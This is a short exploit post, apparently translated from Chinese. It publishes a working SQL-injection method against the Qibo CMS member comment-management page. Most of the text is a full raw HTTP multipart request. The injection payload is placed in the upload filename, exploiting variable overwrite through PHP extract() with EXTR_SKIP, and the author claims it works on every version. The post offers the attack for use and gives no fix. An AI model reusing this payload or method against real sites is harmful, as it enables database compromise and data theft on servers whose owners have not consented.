The detailed analysis of the vulnerability is at
http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13; below I publish the exploitation method and the exp I wrote.
The exploitation steps are as follows:
(1) First visit the "comment management" (評論管理) function under /member and capture the request.
(2) Construct an attachment in the HTTP request, as follows:
POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/qibo/member/comment.php?job=work
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=jo9rpav7l51iakidv01vr9fem1; passport=1%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%0922%091425969668%09http%3A%2F%2F127.0.0.1%2Fqibo%2Fmember%2Fcomment.php%3Fjob%3Dwork
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Length: 227

------WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Disposition: form-data; name="cidDB"; filename="1' and EXP(~(select * from(select user())a)) -- "
Content-Type: text/plain

1111
------WebKitFormBoundary6ukpBHoIrpHKtOkl--
Note that the cidDB[]=x parameter on the original URL must be deleted (if cidDB is already set from the query string, extract() with EXTR_SKIP leaves it untouched and the value taken from the filename is never used);
then build a file-upload message (change the GET to a POST);
and put the injection payload in the filename field.
(3) Submit the packet and the injection succeeds.
By the look of it this works on every version. This variable overwrite takes advantage of the fact that extract() with EXTR_SKIP only checks variables that already exist, so variables that were never declared beforehand can still be overwritten.